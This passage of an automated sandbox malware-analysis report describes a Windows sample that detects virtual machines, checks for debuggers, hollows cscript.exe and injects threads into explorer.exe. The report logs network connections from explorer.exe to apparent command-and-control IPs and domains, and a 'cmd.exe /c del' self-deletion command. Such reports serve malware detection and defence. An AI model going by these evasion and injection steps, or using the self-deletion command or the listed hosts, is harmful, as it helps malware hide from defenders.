          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.689554212.000000000FCDF000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.689491602.000000000FCA3000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.679024096.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.685546854.000000000A9D4000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA}
          Source: explorer.exe, 00000005.00000000.674530269.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.684825933.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 1_2_020706DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 1_2_0207099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 1_2_020709DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 1_2_02070A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 1_2_020708EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04832073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04841074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04797D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04828DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04793A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04804257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0483138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04845BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0483131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.129.33 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.40.211 80
          Source: C:\Windows\explorer.exeDomain query: www.manageoceanaccount.com
          Source: C:\Windows\explorer.exeDomain query: www.cwdelrio.com
          Source: C:\Windows\explorer.exeNetwork Connect: 89.46.109.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.62.54 80
          Source: C:\Windows\explorer.exeDomain query: www.melodezu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.227.87.162 80
          Source: C:\Windows\explorer.exeDomain query: www.sprinkleresources.com
          Source: C:\Windows\explorer.exeDomain query: www.professioneconsulenza.net
          Source: C:\Windows\explorer.exeDomain query: www.fitnesstwentytwenty.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.mydreamtv.net
          Source: C:\Windows\explorer.exeDomain query: www.jorgeporcayo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.47.57.7 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.86.209 80
          Source: C:\Windows\explorer.exeDomain query: www.saludflv.info
          Source: C:\Windows\explorer.exeDomain query: www.iwccgroup.com
          Source: C:\Windows\explorer.exeDomain query: www.builtbydawn.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeSection loaded: unknown target: C:\Users\user\Desktop\85vLO1Rpcy.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 310000
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: explorer.exe, 00000005.00000000.665818761.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmpBinary or memory string: Program Manager
